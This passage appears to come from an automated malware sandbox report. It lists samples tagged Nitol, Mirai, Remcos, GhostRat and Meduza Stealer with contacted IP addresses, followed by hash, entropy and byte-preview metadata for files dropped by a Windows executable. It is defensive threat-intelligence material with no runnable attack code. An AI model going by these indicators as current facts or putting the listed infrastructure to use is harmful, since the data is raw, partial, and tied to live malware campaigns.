                                  1.elfGet hashmaliciousUnknownBrowse
                                  • 47.107.3.205
                                  3.elfGet hashmaliciousUnknownBrowse
                                  • 8.184.34.244
                                  2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                  • 39.103.20.26
                                  2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                  • 39.103.20.26
                                  CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                  • 39.103.20.48
                                  287438657364-7643738421.08.exeGet hashmaliciousUnknownBrowse
                                  • 39.103.20.48
                                  x86_64.elfGet hashmaliciousMiraiBrowse
                                  • 8.171.83.51
                                  i486.elfGet hashmaliciousMiraiBrowse
                                  • 47.107.186.79
                                  arm4.elfGet hashmaliciousMiraiBrowse
                                  • 118.178.206.165
                                  2.elfGet hashmaliciousUnknownBrowse
                                  • 60.205.221.193
                                  1.elfGet hashmaliciousUnknownBrowse
                                  • 47.107.3.205
                                  3.elfGet hashmaliciousUnknownBrowse
                                  • 8.184.34.244
                                  2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                  • 39.103.20.26
                                  2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                  • 39.103.20.26
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  37f463bf4616ecd445d4a1937da06e19c2.htaGet hashmaliciousRemcosBrowse
                                  • 118.178.60.9
                                  • 39.103.20.93
                                  H565rymIuO.docGet hashmaliciousUnknownBrowse
                                  • 118.178.60.9
                                  • 39.103.20.93
                                  287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                  • 118.178.60.9
                                  • 39.103.20.93
                                  287438657364-7643738421.08.exeGet hashmaliciousUnknownBrowse
                                  • 118.178.60.9
                                  • 39.103.20.93
                                  u1XWB0BIju.msiGet hashmaliciousUnknownBrowse
                                  • 118.178.60.9
                                  • 39.103.20.93
                                  setup.msiGet hashmaliciousUnknownBrowse
                                  • 118.178.60.9
                                  • 39.103.20.93
                                  2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                  • 118.178.60.9
                                  • 39.103.20.93
                                  2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                  • 118.178.60.9
                                  • 39.103.20.93
                                  drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                  • 118.178.60.9
                                  • 39.103.20.93
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Program Files (x86)\szbGon\szbGon.exe287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                    2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                      2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                        2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                          45631.exeGet hashmaliciousNitolBrowse
                                            0000000000000000.exeGet hashmaliciousNitolBrowse
                                              T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                setup.ic19.exeGet hashmaliciousGhostRat, NitolBrowse
                                                  Process:C:\Users\user\Documents\lSQb8c.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):54152
                                                  Entropy (8bit):6.64786972992462
                                                  Encrypted:false
                                                  SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                  MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                  SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                  SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                                  • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                                  • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                                  • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                                  • Filename: 45631.exe, Detection: malicious, Browse
                                                  • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                                  • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                                                  • Filename: setup.ic19.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Documents\lSQb8c.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:k:k
                                                  MD5:55A54008AD1BA589AA210D2629C1DF41
                                                  SHA1:BF8B4530D8D246DD74AC53A13471BBA17941DFF7
                                                  SHA-256:4BF5122F344554C53BDE2EBB8CD2B7E3D1600AD631C385A5D7CCE23C7785459A
                                                  SHA-512:7B54B66836C1FBDD13D2441D9E1434DC62CA677FB68F5FE66A464BAADECDBD00576F8D6B5AC3BCC80844B7D50B1CC6603444BBE7CFCF8FC0AA1EE3C636D9E339
                                                  Malicious:false
                                                  Preview:.
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):125333
                                                  Entropy (8bit):7.993522712936246
                                                  Encrypted:true
                                                  SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                                  MD5:2CA9F4AB0970AA58989D66D9458F8701
                                                  SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                                  SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                                  SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):8299
                                                  Entropy (8bit):7.9354275320361545
                                                  Encrypted:false
                                                  SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                                  MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                                  SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                                  SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                                  SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                                                  Process:C:\Users\user\Documents\lSQb8c.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):55085
                                                  Entropy (8bit):7.99273647746538
                                                  Encrypted:true
                                                  SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                  MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                  SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                  SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                  SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):135589
                                                  Entropy (8bit):7.995304392539578
                                                  Encrypted:true
                                                  SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                                  MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                                  SHA1:561836F6228E24180238DF9456707A2443C5795C
                                                  SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                                  SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):28272
                                                  Entropy (8bit):7.711601042292154
                                                  Encrypted:false
                                                  SSDEEP:384:9degCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQK:y5F1FUdy422IK+gAZt2i0YPpQn4GMp
                                                  MD5:DD7FE01656F6001B820833AF3F297C3F
                                                  SHA1:701FF088A57F90BFD463BC5EE6217F57768BBBDD
                                                  SHA-256:C99412F793BBDE4B8F63658DD4E1314FB1DF0E74A0CA1054C15710EAECBB4945
                                                  SHA-512:2598860C832BDA5378C5BF5F21DF3507675B1D868E7ADCBDEF06793DBC1C0572C745C78FA1792F133F6C911753E19F7E7362D1E71CD5265D792C87F7B267B55F
                                                  Malicious:false
                                                  Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb.bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10681
                                                  Entropy (8bit):7.866148090449211
                                                  Encrypted:false
                                                  SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                                  MD5:10A818386411EE834D99AE6B7B68BE71
                                                  SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                                  SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                                  SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Documents\lSQb8c.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):37274
                                                  Entropy (8bit):7.991781062764932
                                                  Encrypted:true
                                                  SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                  MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                  SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                  SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                  SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                  Malicious:false
                                                  Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3892010
                                                  Entropy (8bit):7.995495589600101
                                                  Encrypted:true
                                                  SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                                  MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                                  SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                                  SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                                  SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Documents\lSQb8c.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):879
                                                  Entropy (8bit):4.5851931774575325
                                                  Encrypted:false
                                                  SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                  MD5:E54C4296F011EC91D935AA353C936E34
                                                  SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                  SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                  SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                  Malicious:false
                                                  Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):5.192785716896762
                                                  Encrypted:false
                                                  SSDEEP:12:sp4qkPIfdduXCC7DrdMBIDRD5lc4gUzWg3:sp4ydux73dvND5l1zWU
                                                  MD5:F353D2D8E10D0A068FBDCBE69964B426
                                                  SHA1:48777A2B7B8F643E80EBBB10C86A1FACD3431D21
                                                  SHA-256:6970D5655221DAF5312AC538587E7C732D5D68585A71D8B380E8281DA030C074
                                                  SHA-512:829B763D1409B360463E8724015E72C8725AA86B122A7B06E10CB8744141E570D5DCD2A330A9A6F077D7E6E0D000C43C456748ED46EB96759DD968EF0E728773
                                                  Malicious:false
                                                  Preview:....l%00IEAYn!w6EE.U;x70YZY^9p?2[KG\?/r?PR.^p97888888888888888888888888888888888PLLH;rgg....9v a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33JFBZm"t5FF.V8{43ZYZ]:s<1XHD_<,q<SQ._q86999999999999999999999999999999999QMMI:sff....8w!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3889557
                                                  Entropy (8bit):7.999938756523879
                                                  Encrypted:true
                                                  SSDEEP:98304:xAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:2ndLOZS/DtpPJRO8OHBL4f2UQI+A
                                                  MD5:9A88FE5962B6E1AE0737E048A5313078
                                                  SHA1:E6653592F57C45787163ADE3590AD78519D2D9F1
                                                  SHA-256:3C72C2E83D401E629BB8494AA69D4C56BB57BA4FBD9FC17A0B09E7520E8D41B4
                                                  SHA-512:BE23B6E4F4D930F4738EA1962017869A919E79902A1FBCDBA492D4F50929934692C9032EDCD0C7D60D1A4D714440AD7FCB6509DA98A74A958288B4365B647BDB
                                                  Malicious:false
                                                  Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.QD.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:GIF image data, version 89a, 10 x 10
                                                  Category:dropped
                                                  Size (bytes):8228
                                                  Entropy (8bit):7.978971345776604
                                                  Encrypted:false
                                                  SSDEEP:192:HBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:HBuNhyTlBU2dp+1XrBuCgp9vU0l
                                                  MD5:B640E5704404C29A167FF1627134C9E0
                                                  SHA1:87B646A3FC092C2AA391D9B8E58DC691B3FB5F12
                                                  SHA-256:868B15FD10CD381D5705A3BCE73496A844CD99CB139159BA9C5622B8E6BA3C66
                                                  SHA-512:83C3508FB6D5C681084490BB2F2F40678016EFB5A19E3C949454588A16B40D6BED720B28EF52D68330B5FDE359DA2815BEE4572F391198498847CA00CE420143
                                                  Malicious:false
                                                  Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):133136
